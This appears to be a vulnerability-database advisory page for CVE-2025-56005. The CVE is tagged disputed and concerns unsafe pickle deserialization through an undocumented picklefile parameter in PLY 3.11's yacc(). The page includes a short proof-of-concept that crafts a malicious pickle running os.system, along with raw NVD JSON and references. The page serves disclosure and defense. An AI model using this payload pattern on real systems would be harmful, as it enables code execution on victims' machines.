Security Vulnerability Report
中文
CVE-2025-56005 CVSS 9.8 CRITICAL

CVE-2025-56005

Published: 2026-01-20 19:15:49
Last Modified: 2026-02-06 20:16:08
Source: [email protected]

Description

An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dabeaz:ply:3.11:*:*:*:*:*:*:* - VULNERABLE
PLY < 3.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import pickle import os class RCE: def __reduce__(self): cmd = 'whoami' # 替换为实际命令 return (os.system, (cmd,)) # 生成恶意pickle文件 with open('malicious.pkl', 'wb') as f: pickle.dump(RCE(), f) # 漏洞利用 from ply import yacc parser = yacc(picklefile='malicious.pkl')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56005", "sourceIdentifier": "[email protected]", "published": "2026-01-20T19:15:49.247", "lastModified": "2026-02-06T20:16:08.237", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "An undocumented and unsafe feature in the PLY (Python Lex-Yacc) library 3.11 allows Remote Code Execution (RCE) via the `picklefile` parameter in the `yacc()` function. This parameter accepts a `.pkl` file that is deserialized with `pickle.load()` without validation. Because `pickle` allows execution of embedded code via `__reduce__()`, an attacker can achieve code execution by passing a malicious pickle file. The parameter is not mentioned in official documentation or the GitHub repository, yet it is active in the PyPI version. This introduces a stealthy backdoor and persistence risk. NOTE: A third-party states that this vulnerability should be rejected because the proof of concept does not demonstrate arbitrary code execution and fails to complete successfully."}, {"lang": "es", "value": "Una característica indocumentada e insegura en la librería PLY (Python Lex-Yacc) 3.11 permite la ejecución remota de código (RCE) a través del parámetro 'picklefile' en la función 'yacc()'. Este parámetro acepta un archivo .pkl que se deserializa con 'pickle.load()' sin validación. Debido a que 'pickle' permite la ejecución de código incrustado a través de '__reduce__()', un atacante puede lograr la ejecución de código pasando un archivo pickle malicioso. El parámetro no se menciona en la documentación oficial ni en el repositorio de GitHub, sin embargo, está activo en la versión de PyPI. Esto introduce una puerta trasera sigilosa y un riesgo de persistencia. NOTA: Un tercero afirma que esta vulnerabilidad debería ser rechazada porque la prueba de concepto no demuestra la ejecución de código arbitrario y no se completa con éxito."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dabeaz:ply:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "278FED9B-7970-410E-B5F5-C87B229441CC"}]}]}], "references": [{"url": "https://github.com/bohmiiidd/Undocumented-RCE-in-PLY", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/bohmiiidd/Undocumument_RCE_PLY-yacc-CVE-2025-56005", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/tom025/ply_exploit_rejection", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://github.com/tom025/ply_exploit_rejection/issues/1", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/23/4", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/23/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/28/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/29/1", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Exploit", "Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/29/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/30/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.